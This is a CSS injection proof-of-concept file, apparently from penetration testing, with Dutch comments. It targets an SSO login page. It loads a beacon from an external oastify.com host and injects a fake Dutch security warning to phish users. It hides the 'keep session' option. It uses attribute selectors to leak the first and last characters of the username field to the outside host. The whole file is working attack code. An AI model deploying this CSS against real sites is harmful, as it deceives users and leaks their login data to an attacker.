/* evil.css - CSS Injection PoC

/* ================================================
   1. BEACON: bewijst dat externe CSS geladen wordt
   ================================================ */
body {
  background-image: url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/loaded') !important;
  background-repeat: no-repeat !important;
  background-position: -9999px -9999px !important;
}

/* ================================================
   2. VISUELE MANIPULATIE: nep beveiligingsmelding
   op de echte SSO loginpagina (phishing via CSS)
   ================================================ */
.panel-heading::before {
  content: "\26A0  Beveiligingsmelding: Uw sessie is verlopen wegens verdachte activiteit. Verifieer uw identiteit.";
  display: block;
  color: #856404;
  font-weight: bold;
  padding: 12px;
  background: #fff3cd;
  border: 1px solid #ffc107;
  border-radius: 4px;
  margin-bottom: 10px;
  font-size: 13px;
}

#KeepSession, label[for="KeepSession"] {
  display: none !important;
}

/* ================================================
   3. USERNAME EXFILTRATIE: eerste letter
   Gebruikt background-image (1 match per element).
   Alleen de matchende selector triggert 1 request.
   ================================================ */
input#LogOnName[value^="a" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-A')!important}
input#LogOnName[value^="b" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-B')!important}
input#LogOnName[value^="c" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-C')!important}
input#LogOnName[value^="d" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-D')!important}
input#LogOnName[value^="e" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-E')!important}
input#LogOnName[value^="f" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-F')!important}
input#LogOnName[value^="g" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-G')!important}
input#LogOnName[value^="h" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-H')!important}
input#LogOnName[value^="i" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-I')!important}
input#LogOnName[value^="j" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-J')!important}
input#LogOnName[value^="k" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-K')!important}
input#LogOnName[value^="l" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-L')!important}
input#LogOnName[value^="m" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-M')!important}
input#LogOnName[value^="n" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-N')!important}
input#LogOnName[value^="o" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-O')!important}
input#LogOnName[value^="p" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-P')!important}
input#LogOnName[value^="q" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-Q')!important}
input#LogOnName[value^="r" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-R')!important}
input#LogOnName[value^="s" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-S')!important}
input#LogOnName[value^="t" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-T')!important}
input#LogOnName[value^="u" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-U')!important}
input#LogOnName[value^="v" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-V')!important}
input#LogOnName[value^="w" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-W')!important}
input#LogOnName[value^="x" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-X')!important}
input#LogOnName[value^="y" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-Y')!important}
input#LogOnName[value^="z" i]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-Z')!important}
input#LogOnName[value^="0"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-0')!important}
input#LogOnName[value^="1"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-1')!important}
input#LogOnName[value^="2"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-2')!important}
input#LogOnName[value^="3"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-3')!important}
input#LogOnName[value^="4"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-4')!important}
input#LogOnName[value^="5"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-5')!important}
input#LogOnName[value^="6"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-6')!important}
input#LogOnName[value^="7"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-7')!important}
input#LogOnName[value^="8"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-8')!important}
input#LogOnName[value^="9"]{background-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-starts-9')!important}

/* ================================================
   4. USERNAME EXFILTRATIE: laatste letter
   Gebruikt list-style-image (apart kanaal, geen
   conflict met background-image hierboven).
   ================================================ */
input#LogOnName[value$="a" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-A')!important}
input#LogOnName[value$="b" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-B')!important}
input#LogOnName[value$="c" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-C')!important}
input#LogOnName[value$="d" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-D')!important}
input#LogOnName[value$="e" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-E')!important}
input#LogOnName[value$="f" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-F')!important}
input#LogOnName[value$="g" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-G')!important}
input#LogOnName[value$="h" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-H')!important}
input#LogOnName[value$="i" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-I')!important}
input#LogOnName[value$="j" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-J')!important}
input#LogOnName[value$="k" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-K')!important}
input#LogOnName[value$="l" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-L')!important}
input#LogOnName[value$="m" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-M')!important}
input#LogOnName[value$="n" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-N')!important}
input#LogOnName[value$="o" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-O')!important}
input#LogOnName[value$="p" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-P')!important}
input#LogOnName[value$="q" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-Q')!important}
input#LogOnName[value$="r" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-R')!important}
input#LogOnName[value$="s" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-S')!important}
input#LogOnName[value$="t" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-T')!important}
input#LogOnName[value$="u" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-U')!important}
input#LogOnName[value$="v" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-V')!important}
input#LogOnName[value$="w" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-W')!important}
input#LogOnName[value$="x" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-X')!important}
input#LogOnName[value$="y" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-Y')!important}
input#LogOnName[value$="z" i]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-Z')!important}
input#LogOnName[value$="0"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-0')!important}
input#LogOnName[value$="1"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-1')!important}
input#LogOnName[value$="2"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-2')!important}
input#LogOnName[value$="3"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-3')!important}
input#LogOnName[value$="4"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-4')!important}
input#LogOnName[value$="5"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-5')!important}
input#LogOnName[value$="6"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-6')!important}
input#LogOnName[value$="7"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-7')!important}
input#LogOnName[value$="8"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-8')!important}
input#LogOnName[value$="9"]{list-style-image:url('https://4kprfplc9a8lae7d37c6cag6ux0ooec3.oastify.com/username-ends-9')!important}
